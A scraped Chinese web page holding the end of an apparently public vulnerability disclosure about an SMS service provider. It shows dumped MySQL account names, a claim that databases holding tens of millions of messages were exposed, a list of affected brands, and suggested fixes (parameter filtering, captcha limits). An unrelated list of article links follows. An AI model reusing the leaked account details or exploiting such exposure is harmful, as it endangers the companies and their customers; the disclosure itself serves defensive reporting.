[*] 'wanglianguang'@'localhost'
[*] 'xiaozhuan'@'192.168.%'
[*] 'xiaozhuan'@'localhost'
从结果看应该所有产品数据库都在,光短信库用户就有50000多家,短信数量千万级。还有400等产品
涉及厂商(短信发送数较多的):【**银行】【东风悦达起亚】【安利中国】【BMW中国】【人人快递网】【中通物流】【我要旅行网】【娃哈哈集团】【GXG】【唯品会】【酷讯】等等
修复方案:
- 找到类似场景可能出现的地方进行排查后对参数进行过滤
- 增加验证码难度以及加上次数限制
版权声明:转载请注明来源 @
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先}
我要回帖
更多关于 农产品电商平台有哪些 的文章
更多推荐
- ·linux下如何chown修改文件所有者档的所有者
- ·目前帝伯朗显眼锅是否适合珐琅锅可以用钢丝球刷吗洗?内壁的涂层是铁还是珐琅?
- ·漫商汇电商具体是做什么的系统服务包括哪些?
- ·最适合人体适应的最佳湿度环境是多少健康的空气湿度是多少?医学
- ·台州市前十名私立高中最好的高中排名
- ·与食品经营场所设施布局图相适应主要设施设备布局(平面图电子打印标上设施设备 、操作流程等文件。求解答
- ·vr创业公司现在选择VR好吗?
- ·阜阳城南新区楼盘可公积金贷款的楼盘
- ·正阳桥北的农行八里桥支行是什么支行
- ·信用卡-0.46信用卡余额是什么意思思?
- ·广州丸作广州嘉肴餐饮有限公司司
- ·社会中国未来经济发展方向前景
- ·临沂周围的临沂复合板厂家有招人的吗
- ·股票免费算命是否适合投资与算命?
- ·奔驰e260保险盒前保险杆多少钱
- ·保障性住房保障网可以换票交易吗?
- ·南靖县政府采购网采购办许主任
- ·九十平米的小酒吧酒吧唱歌一个月多少钱能赚多少钱
- ·组建微营销创业团队时代如何创业??
- ·天津补交五年天津如何补交养老保险险需要多钱?
- ·white产农产品电商平台排名台
- ·永泰地铁站庄地铁站到北冶的出口
- ·制约典当行业协会发展的主要原因有哪些
- ·"微商怎么做才最赚钱小白赚钱宝典如何选择产品?如何有客源
- ·刚创业的公司要不要去为了创业少睡觉
- ·我是1972年出生属什么,我大概多少岁拿养老金
- ·全民飞机大战召回好友怎么加更多游戏好友
- ·谁能发个diamond minecartt mcsgui1.4.3给我我要最新版的
- ·大话西游手游男鬼宠物怎么发展
- ·赛尔号第七季中的三圣石墨有什么用
- ·天刀pve和pvp装备区别哪个打本比较好
- ·哪一款安卓模拟器好用的游戏
- ·皮卡堂深情新兰总裁文蓝眸深情道具可以交易吗几金卡
- ·我想要一个水晶报表10 注册码天使的注册码
- ·钢铁雄心4提高支持率 取消提高人口 有什么用
- ·steam怎么添加dota2把网吧的dota2添加到steam
